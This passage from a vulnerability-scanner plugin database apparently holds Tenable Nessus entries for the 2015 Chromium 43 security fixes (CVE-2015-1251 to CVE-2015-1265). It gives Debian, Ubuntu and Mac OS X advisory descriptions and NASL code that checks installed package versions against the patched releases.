CVE-2015-1255 Khalil Zhani discovered a use-after-free issue in WebAudio.\n\n - CVE-2015-1256 Atte Kettunen discovered a use-after-free issue in the SVG implementation.\n\n - CVE-2015-1257 miaubiz discovered an overflow issue in the SVG implementation.\n\n - CVE-2015-1258 cloudfuzzer discovered an invalid size parameter used in the libvpx library.\n\n - CVE-2015-1259 Atte Kettunen discovered an uninitialized memory issue in the pdfium library.\n\n - CVE-2015-1260 Khalil Zhani discovered multiple use-after-free issues in chromium's interface to the WebRTC library.\n\n - CVE-2015-1261 Juho Nurminen discovered a URL bar spoofing issue.\n\n - CVE-2015-1262 miaubiz discovered the use of an uninitialized class member in font handling.\n\n - CVE-2015-1263 Mike Ruddy discovered that downloading the spellcheck dictionary was not done over HTTPS.\n\n - CVE-2015-1264 K0r3Ph1L discovered a cross-site scripting issue that could be triggered by bookmarking a site.\n\n - CVE-2015-1265 The chrome 43 development team found and fixed various issues during internal auditing. Also multiple issues were fixed in the libv8 library, version 4.3.61.21.", "cvss3": {}, "published": "2015-05-26T00:00:00", "type": "nessus", "title": "Debian DSA-3267-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:chromium-browser"], "id": "DEBIAN_DSA-3267.NASL", "href": "https://www.tenable.com/plugins/nessus/83784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3267. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83784);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_bugtraq_id(74723, 74727);\n script_xref(name:\"DSA\", value:\"3267\");\n\n script_name(english:\"Debian DSA-3267-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in the chromium web browser.\n\n - CVE-2015-1251\n SkyLined discovered a use-after-free issue in speech\n recognition.\n\n - CVE-2015-1252\n An out-of-bounds write issue was discovered that could\n be used to escape from the sandbox.\n\n - CVE-2015-1253\n A cross-origin bypass issue was discovered in the DOM\n parser.\n\n - CVE-2015-1254\n A cross-origin bypass issue was discovered in the DOM\n editing feature.\n\n - CVE-2015-1255\n Khalil Zhani discovered a use-after-free issue in\n WebAudio.\n\n - CVE-2015-1256\n Atte Kettunen discovered a use-after-free issue in the\n SVG implementation.\n\n - CVE-2015-1257\n miaubiz discovered an overflow issue in the SVG\n implementation.\n\n - CVE-2015-1258\n cloudfuzzer discovered an invalid size parameter used in\n the libvpx library.\n\n - CVE-2015-1259\n Atte Kettunen discovered an uninitialized memory issue\n in the pdfium library.\n\n - CVE-2015-1260\n Khalil Zhani discovered multiple use-after-free issues\n in chromium's interface to the WebRTC library.\n\n - CVE-2015-1261\n Juho Nurminen discovered a URL bar spoofing issue.\n\n - CVE-2015-1262\n miaubiz discovered the use of an uninitialized class\n member in font handling.\n\n - CVE-2015-1263\n Mike Ruddy discovered that downloading the spellcheck\n dictionary was not done over HTTPS.\n\n - CVE-2015-1264\n K0r3Ph1L discovered a cross-site scripting issue that\n could be triggered by bookmarking a site.\n\n - CVE-2015-1265\n The chrome 43 development team found and fixed various\n issues during internal auditing. Also multiple issues\n were fixed in the libv8 library, version 4.3.61.21.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1258\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1262\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3267\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 43.0.2357.65-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"43.0.2357.65-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:47", "description": "The version of Google Chrome on the remote host is prior to 43.0.2357.65 and is affected by the following vulnerabilities :\n\n - A use-after-free memory error exists in the SpeechRecognitionClient implementation that allows remote attackers, using a crafted document, to execute arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class PartialCircularBuffer do not properly handle wraps. A remote attacker, by using write operations with a large amount of data, can exploit this to bypass the sandbox protection or cause a denial of service. (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly handle SCRIPT elements during adjustment of DOM node locations. A remote attacker, using crafted JavaScript code that appends a child to a SCRIPT element, can exploit this flaw to bypass the same origin policy. (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the inheritance of the 'designMode' attribute. A remote attacker, using a crafted web page, can utilize this to bypass the same origin policy via the availability of editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio implementation when handling the stop action for an audio track. A remote attacker can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG implementation in Blink, related to the improper handling of a shadow tree for a use element. A remote attacker, using a crafted document, can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle an insufficient number of values in an 'feColorMatrix' filter. A remote attacker, using a crafted document, can exploit this to cause a denial of service via a container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an appropriate '--size-limit' value. This allows a remote attacker, using a crafted frame size in VP9 video data, to trigger a negative value for a size field, thus causing a denial of service or possibly having other impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact. (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC implementation. A remote attacker can exploit these, by using a crafted JavaScript code that executes upon completion of a 'getUserMedia' request, to cause a denial of service or possibly have other unspecified impacts. (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly initialize a certain width field. A remote attacker, using crafted Unicode text, can exploit this to cause a denial of service or have other unspecified impacts. (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS session for downloading a Hunspell dictionary. A man-in-the-middle attacker, using a crafted file, can exploit this flaw to deliver incorrect spelling suggestions or possibly have other unspecified impacts. (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that is related to the Bookmarks feature. A remote attacker, using crafted data, can exploit this to inject arbitrary web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265)", "cvss3": {}, "published": "2015-06-16T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.65 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "8782.PASL", "href": "https://www.tenable.com/plugins/nnm/8782", "sourceData": "Binary data 8782.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T15:07:30", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 43.0.2357.65. It is, therefore, affected by multiple vulnerabilities :\n\n - A Use-after-free memory error exists in the SpeechRecognitionClient implementation that allows remote attackers, using a crafted document, to execute arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a large amount of data, can exploit this to bypass the sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly handle SCRIPT elements during adjustment of DOM node locations. A remote attacker, using crafted JavaScript code that appends a child to a SCRIPT element, can exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the inheritance of the 'designMode' attribute. A remote attacker, using a crafted web page, can utilize this to bypass the same origin policy via the availability of editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio implementation when handling the stop action for an audio track. A remote attacker can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG implementation in Blink, related to the improper handling of a shadow tree for a use element. A remote attacker, using a crafted document, can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle an insufficient number of values in an feColorMatrix filter. A remote attacker, using a crafted document, can exploit this to cause a denial of service via a container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an appropriate '--size-limit' value. This allows a remote attacker, using a crafted frame size in VP9 video data, to trigger a negative value for a size field, thus causing a denial of service or possibly having other impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC implementation. A remote attacker can exploit these, by using a crafted JavaScript code that executes upon completion of a getUserMedia request, to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly initialize a certain width field. A remote attacker, using crafted Unicode text, can exploit this to cause a denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS session for downloading a Hunspell dictionary. A man-in-the-middle attacker, using a crafted file, can exploit this flaw to deliver incorrect spelling suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that is related to the Bookmarks feature. A remote attacker, using crafted data, can exploit this to inject arbitrary web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2015-05-21T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.65 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_43_0_2357_65.NASL", "href": "https://www.tenable.com/plugins/nessus/83746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83746);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-1251\",\n \"CVE-2015-1252\",\n \"CVE-2015-1253\",\n \"CVE-2015-1254\",\n \"CVE-2015-1255\",\n \"CVE-2015-1256\",\n \"CVE-2015-1257\",\n \"CVE-2015-1258\",\n \"CVE-2015-1259\",\n \"CVE-2015-1260\",\n \"CVE-2015-1262\",\n \"CVE-2015-1263\",\n \"CVE-2015-1264\",\n \"CVE-2015-1265\"\n );\n script_bugtraq_id(74723, 74727);\n\n script_name(english:\"Google Chrome < 43.0.2357.65 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 43.0.2357.65. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A Use-after-free memory error exists in the\n SpeechRecognitionClient implementation that allows\n remote attackers, using a crafted document, to execute\n arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class\n PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a\n large amount of data, can exploit this to bypass the\n sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly\n handle SCRIPT elements during adjustment of DOM node\n locations. A remote attacker, using crafted JavaScript\n code that appends a child to a SCRIPT element, can\n exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the\n inheritance of the 'designMode' attribute. A remote\n attacker, using a crafted web page, can utilize this to\n bypass the same origin policy via the availability of\n editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio\n implementation when handling the stop action for an\n audio track. A remote attacker can exploit this to\n cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG\n implementation in Blink, related to the improper\n handling of a shadow tree for a use element. A remote\n attacker, using a crafted document, can exploit this\n to cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle\n an insufficient number of values in an feColorMatrix\n filter. A remote attacker, using a crafted document, can\n exploit this to cause a denial of service via a\n container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an\n appropriate '--size-limit' value. This allows a remote\n attacker, using a crafted frame size in VP9 video data,\n to trigger a negative value for a size field, thus\n causing a denial of service or possibly having other\n impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A\n remote attacker can exploit this to cause a denial of\n service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC\n implementation. A remote attacker can exploit these, by\n using a crafted JavaScript code that executes upon\n completion of a getUserMedia request, to cause a denial\n of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly\n initialize a certain width field. A remote attacker,\n using crafted Unicode text, can exploit this to cause a\n denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS\n session for downloading a Hunspell dictionary. A\n man-in-the-middle attacker, using a crafted file, can\n exploit this flaw to deliver incorrect spelling\n suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that\n is related to the Bookmarks feature. A remote attacker,\n using crafted data, can exploit this to inject arbitrary\n web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an\n attacker to cause a denial of service or possibly have\n other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update_19.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9eefd81\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1265\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'43.0.2357.65', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T16:01:54", "description": "Several security issues were discovered in the DOM implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to bypass Same Origin Policy restrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC implementation in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via renderer crash, or execute arbitrary code with the privileges of the sandboxed render process.\n(CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service via application crash or execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service via renderer crash or execute arbitrary code with the privileges of the sandboxed render process. (CVE-2015-3910).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-05-22T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Oxide vulnerabilities (USN-2610-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1265", "CVE-2015-3910"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "p-cpe:/a:canonical:ubuntu_linux:liboxideqtquick0", "p-cpe:/a:canonical:ubuntu_linux:oxideqmlscene", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-chromedriver", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs", "p-cpe:/a:canonical:ubuntu_linux:oxideqt-codecs-extra", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:liboxideqt-qmlplugin"], "id": "UBUNTU_USN-2610-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83778", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2610-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83778);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2015-1253\",\n \"CVE-2015-1254\",\n \"CVE-2015-1255\",\n \"CVE-2015-1256\",\n \"CVE-2015-1257\",\n \"CVE-2015-1258\",\n \"CVE-2015-1260\",\n \"CVE-2015-1262\",\n \"CVE-2015-1265\",\n \"CVE-2015-3910\"\n );\n script_bugtraq_id(74723, 74727);\n script_xref(name:\"USN\", value:\"2610-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Oxide vulnerabilities (USN-2610-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several security issues were discovered in the DOM implementation in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit these to bypass Same\nOrigin Policy restrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in\nChromium. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service via renderer crash, or execute arbitrary code with the\nprivileges of the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If\na user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service\nvia renderer crash, or execute arbitrary code with the privileges of\nthe sandboxed render process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If\na user were tricked in to opening a specially crafted website, an\nattacker could potentially exploit this to cause a denial of service\nvia renderer crash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via renderer\ncrash, or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC\nimplementation in Chromium. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit these\nto cause a denial of service via renderer crash, or execute arbitrary\ncode with the privileges of the sandboxed render process.\n(CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in\nBlink. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service via renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via renderer crash or execute arbitrary code with the\nprivileges of the sandboxed render process. (CVE-2015-3910).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2610-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3910\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2015-1265\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtquick0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqmlscene\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:oxideqt-chromedriver\");\n script_set_attribute(attribute:\"cpe\", 